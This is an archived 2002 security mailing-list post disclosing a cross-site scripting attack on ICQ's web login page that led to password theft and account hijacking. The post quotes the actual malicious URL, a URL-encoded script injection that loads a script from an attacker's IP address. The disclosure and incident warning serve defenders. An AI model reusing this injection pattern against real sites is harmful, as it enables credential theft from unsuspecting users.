[Fwd: XSS on ICQ leading to password compromise]

From: Rafael Coninck Teigao (rafaelat_private)
Date: Mon Dec 02 2002 - 08:29:37 PST

Next message: John Sage: "Re: TCP:80, TCP:1433 squelda 1.0 probe"

Previous message: Joe Stewart: "Re: TCP:80, TCP:1433 squelda 1.0 probe"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Moderator:
	I've sent the following email to bugtraq last week. Haven't seen it on
the list, but it came to my attention that even more account's were
hijacked this way.
	I'm also sending this to incidents, because I think that maybe some
administrators are receiving similar complaints from their users and
could (perhaps) block the XSS pages somehow.

-------- Original Message --------
From: Rafael Coninck Teigao <rafaelat_private>
Subject: XSS on ICQ leading to password compromise
To: SecurityFocus - Bugtraq <bugtraqat_private>
CC: horvathat_private, ahiat_private,nbsoat_private

Hello, pp.
    I've tried to find some representative from de ICQ technical staff
but had no success so far.
    Anyway, here's what's happening:
    A friend of mine got the following address on his ICQ from a friend
on his contact list:
http://web.icq.com/login/login_page/1,,err_sys_busy,00.html?karma_err_msg=="%68%74%74%70%3A%2F%2F200%2E158%2E50%2E245%2Fweb%2Ficq%2Easa"%3E</script%3e

we can clearly see the <script... part on it. Unfortunately, he
couldn't.
    When the page opened, he typed his email address and password. Five
minutes later he was disconnected from ICQ and was unable to login
again.
    He then tried to recover his password and saw that it was set to:
aaaaa
a
    that's right, it has a new line on it.
    The source on the script is:
http://200.158.50.245/web/icq.asa
    That IP address comes from an ADSL from Telesp. The date and time of
the incident were Nov/24 at 20:12 (GMT -2).

    He also told me that the friend who sent him the address and another
person had their accounts hijacked as well.

    Best regards,
    Rafael Coninck Teigao
    SafeCore Network Solutions
    http://SafeCore.NET
    +55 41 224 1785

--
------------------------------------------------------------------------
"The only people for me are the mad ones -- the ones who are mad to
live, mad to talk, mad to be saved, desirous of everything at the same
time, the ones who never yawn or say a commonplace thing, but burn,
burn, burn like fabulous yellow Roman candles."
    -- Jack Kerouac, "On the Road"
------------------------------------------------------------------------

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: John Sage: "Re: TCP:80, TCP:1433 squelda 1.0 probe"
Previous message: Joe Stewart: "Re: TCP:80, TCP:1433 squelda 1.0 probe"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Dec 02 2002 - 15:30:42 PST